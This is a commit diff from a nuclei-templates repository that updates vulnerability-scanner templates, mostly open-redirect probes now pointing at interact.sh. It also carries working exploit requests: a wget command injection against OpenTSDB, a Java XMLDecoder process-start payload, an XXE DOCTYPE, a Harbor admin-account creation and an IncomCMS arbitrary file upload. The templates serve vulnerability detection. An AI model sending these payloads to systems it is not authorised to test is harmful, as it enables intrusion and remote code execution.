Merge branch 'projectdiscovery:master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-06-06 10:12:35 -04:00 committed by GitHub
commit 8ad6525611
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
120 changed files with 2425 additions and 1918 deletions

View File

@ -1,13 +1,13 @@
cves/2021/CVE-2021-20137.yaml cves/2018/CVE-2018-14474.yaml
cves/2021/CVE-2021-24245.yaml cves/2018/CVE-2018-16761.yaml
cves/2021/CVE-2021-27519.yaml cves/2020/CVE-2020-29597.yaml
exposed-panels/gryphon-login.yaml cves/2021/CVE-2021-27748.yaml
exposed-panels/zyxel/zyxel-firewall-panel.yaml cves/2022/CVE-2022-29383.yaml
file/audit/cisco/configure-aaa-service.yaml cves/2022/CVE-2022-31268.yaml
file/audit/cisco/configure-service-timestamps-debug.yaml exposed-panels/eventum-panel.yaml
file/audit/cisco/configure-service-timestamps-logmessages.yaml exposures/files/appsettings-file-disclosure.yaml
file/audit/cisco/disable-ip-source-route.yaml exposures/files/django-secret-key.yaml
file/audit/cisco/disable-pad-service.yaml exposures/files/ftpconfig.yaml
file/audit/cisco/enable-secret-for-password-user-and-.yaml exposures/files/git-mailmap.yaml
file/audit/cisco/logging-enable.yaml exposures/files/php-ini.yaml
file/audit/cisco/set-and-secure-passwords.yaml vulnerabilities/other/phpok-sqli.yaml

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 | | cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 | | panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 | | lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 | | xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | | | wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | | rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | | | exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | | | cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | | | wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | pussycat0x | 116 | file | 68 | | | | | | tech | 274 | gy741 | 122 | file | 76 | | | | |
**264 directories, 3622 files**. **265 directories, 3636 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 | | cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 | | panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 | | lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 | | xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | | | wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | | rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | | | exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | | | cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | | | wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | pussycat0x | 116 | file | 68 | | | | | | tech | 274 | gy741 | 122 | file | 76 | | | | |

View File

@ -9,6 +9,16 @@
"email": "" "email": ""
} }
}, },
{
"author": "Dhiyaneshwaran",
"links": {
"github": "https://github.com/DhiyaneshGeek",
"twitter": "https://twitter.com/DhiyaneshDK",
"linkedin": "https://www.linkedin.com/in/dhiyaneshwaran-b-27947a131/",
"website": "https://dhiyaneshgeek.github.io/",
"email": ""
}
},
{ {
"author": "duty_1g", "author": "duty_1g",
"links": { "links": {

View File

@ -19,13 +19,13 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/awstats/awredir.pl?url=example.com' - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com' - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/02/13 # Enhanced by mp on 2022/02/13

View File

@ -18,12 +18,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.action?redirect:http://www.example.com/" - "{{BaseURL}}/index.action?redirect:http://www.interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header
# Enhanced by mp on 2022/02/21 # Enhanced by mp on 2022/02/21

View File

@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/" - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/25 # Enhanced by mp on 2022/02/25

View File

@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://example.com' - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -17,10 +17,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header

View File

@ -16,10 +16,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/" - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header

View File

@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/login?redir=http://www.example.com' - '{{BaseURL}}/login?redir=http://www.interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -42,7 +42,7 @@ requests:
<string>-c</string> <string>-c</string>
</void> </void>
<void index="2"> <void index="2">
<string>example.com</string> <string>interact.sh</string>
</void> </void>
</array> </array>
<void method="start"/></void> <void method="start"/></void>

View File

@ -26,7 +26,7 @@ requests:
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
- | - |
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1 GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
cookie-reuse: true cookie-reuse: true
@ -34,4 +34,4 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -20,12 +20,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"
matchers: matchers:
- type: word - type: word
words: words:
- 'noresize src="/\example.com?configName=' - 'noresize src="/\interact.sh?configName='
part: body part: body
# Enhanced by mp on 2022/04/14 # Enhanced by mp on 2022/04/14

View File

@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}//example.com" - "{{BaseURL}}//interact.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh"
part: header part: header
# Enhanced by mp on 2022/04/26 # Enhanced by mp on 2022/04/26

View File

@ -19,10 +19,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -23,10 +23,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com' - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh'
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- '<META http-equiv="Refresh" content="0;URL=http://attacker.com">' - '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'

View File

@ -0,0 +1,32 @@
id: CVE-2018-14474
info:
name: OrangeForum 1.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
reference:
- https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
- https://seclists.org/fulldisclosure/2019/Jan/32
- https://vuldb.com/?id.122045
- https://nvd.nist.gov/vuln/detail/CVE-2018-14474
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-14474
cwe-id: CWE-601
tags: cve,cve2018,redirect,orangeforum,oss
requests:
- method: GET
path:
- '{{BaseURL}}/login?next=http://interact.sh/?app.scan/'
- '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -22,7 +22,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}//www.example.com" - "{{BaseURL}}//www.interact.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -31,6 +31,6 @@ requests:
- 301 - 301
- type: word - type: word
words: words:
- "Location: https://www.example.com" - "Location: https://www.interact.sh"
- "Location: http://www.example.com" - "Location: http://www.interact.sh"
part: header part: header

View File

@ -19,12 +19,12 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com' - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/26 # Enhanced by mp on 2022/04/26

View File

@ -0,0 +1,32 @@
id: CVE-2018-16761
info:
name: Eventum v3.3.4 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Eventum before 3.4.0 has an open redirect vulnerability.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
- https://github.com/eventum/eventum/
- https://www.cvedetails.com/cve/CVE-2018-16761/
- https://github.com/eventum/eventum/releases/tag/v3.4.0
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-16761
cwe-id: CWE-601
tags: cve,cve2018,redirect,eventum,oss
requests:
- method: GET
path:
- '{{BaseURL}}/select_project.php?url=http://interact.sh'
- '{{BaseURL}}/clock_status.php?current_page=http://interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -22,8 +22,8 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com' - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com' - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
@ -32,7 +32,7 @@ requests:
- type: word - type: word
part: body part: body
words: words:
- "self.location = 'http://www.example.com'" - "self.location = 'http://www.interact.sh'"
- type: status - type: status
status: status:

View File

@ -20,7 +20,7 @@ requests:
path: path:
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp' - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://example.com"> body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://interact.sh">
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -21,8 +21,8 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/redirector.php?url=https://attacker.com' - '{{BaseURL}}/redirector.php?url=https://interact.sh'
- '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com' - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh'
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -30,7 +30,7 @@ requests:
- type: word - type: word
part: body part: body
words: words:
- '<meta http-equiv="refresh" content="0; URL=https://attacker.com">' - '<meta http-equiv="refresh" content="0; URL=https://interact.sh">'
- type: status - type: status
status: status:

View File

@ -19,10 +19,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com' - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -25,10 +25,10 @@ requests:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$" - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"

View File

@ -25,7 +25,7 @@ requests:
headers: headers:
Content-Type: application/json Content-Type: application/json
body: | body: |
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"} {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"}
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com' - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/updating.jsp?url=https://example.com/" - "{{BaseURL}}/updating.jsp?url=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header

View File

@ -21,13 +21,13 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/index.php?redirect=/\/evil.com/' - '{{BaseURL}}/index.php?redirect=/\/interact.sh/'
- '{{BaseURL}}/index.php?redirect=//evil.com' - '{{BaseURL}}/index.php?redirect=//interact.sh'
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header part: header
# Enhanced by mp on 2022/05/04 # Enhanced by mp on 2022/05/04

View File

@ -20,12 +20,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/' - '{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/'
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
part: header part: header
# Enhanced by mp on 2022/05/04 # Enhanced by mp on 2022/05/04

View File

@ -30,7 +30,7 @@ requests:
"upstream":{ "upstream":{
"type":"roundrobin", "type":"roundrobin",
"nodes":{ "nodes":{
"example.com:80":1 "interact.sh:80":1
} }
} }
} }

View File

@ -28,7 +28,7 @@ requests:
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- | - |
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2 GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
Host: {{Hostname}} Host: {{Hostname}}
cookie-reuse: true cookie-reuse: true
@ -36,4 +36,4 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -19,10 +19,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com" - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header part: header

View File

@ -19,10 +19,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?url=http://example.com' - '{{BaseURL}}/?url=http://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'

View File

@ -17,14 +17,14 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com' - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: header part: header
words: words:
- "Location: https://example.com" - "Location: https://interact.sh"
- type: status - type: status
status: status:

View File

@ -0,0 +1,45 @@
id: CVE-2020-29597
info:
name: IncomCMS 2.0 - Arbitary files upload
author: princechaddha
severity: critical
description: |
IncomCMS 2.0 has a modules/uploader/showcase/script.php insecure file upload vulnerability. This vulnerability allows unauthenticated attackers to upload files into the server.
reference:
- https://github.com/Trhackno/CVE-2020-29597
- https://nvd.nist.gov/vuln/detail/CVE-2020-29597
- https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
- https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29597
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2020,incomcms,fileupload,intrusive
requests:
- raw:
- |
POST /incom/modules/uploader/showcase/script.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt
------WebKitFormBoundaryBEJZt0IK73M2mAbt
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.png"
Content-Type: image/png
------WebKitFormBoundaryBEJZt0IK73M2mAbt--
- |
GET /upload/userfiles/image/{{randstr}}.png HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_1, '\"name\":\"{{randstr}}.png\"')
- status_code_2 == 200
condition: and

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json" - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status

View File

@ -22,10 +22,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
